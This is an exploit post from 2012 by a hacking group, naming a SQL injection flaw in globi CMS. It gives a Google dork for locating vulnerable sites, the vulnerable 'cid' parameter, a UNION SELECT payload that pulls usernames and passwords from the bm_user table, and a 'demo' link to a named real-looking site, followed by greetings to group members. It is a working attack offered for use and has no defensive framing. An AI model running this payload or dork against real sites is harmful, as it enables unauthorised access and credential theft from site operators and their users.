<!--
													  
   ________        .__        __________________     
   \_   ___ \_______|__| _____ \_____  \______   \   
   /    \  \/\_  __ \  |/     \  _(__  <|       _/   
   \     \____|  | \/  |  Y Y  \/       \    |   \   
    \______  /|__|  |__|__|_|  /______  /____|_  /   
           \/                \/       \/       \/    
		                         M3Mb3R OF AjaxTm									       
                                                   -->
############################################################################
# Exploit Title: globi CMS SQL Injection Vulnerability
# Google Dork: "Powered by globi"
# Date: 9/7/2012
# Author: Ajax Security Team
# Discovered By: Crim3R
# Home: WwW.AjaxTm.CoM
# Vendor Software: http://www.globi.ca/
# Version: All Version
# Category:: webapps
# Tested on: GNU/Linux Ubuntu - Windows Server - win7
############################################################################
==================================

 [+] cid parametr is Vulnerable to sqli
 [+] union+select+1,concat(username,0x3a,password),3,4,5,6+from+bm_user--
 
D3m0:

http://www.bench-mark.ca/index.php?cid=169

===============Crim3R@Att.Net=========

[+] Greetz to All Ajaxtm Security Member

Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal
devilzc0der - Dominator - Hossein.R1369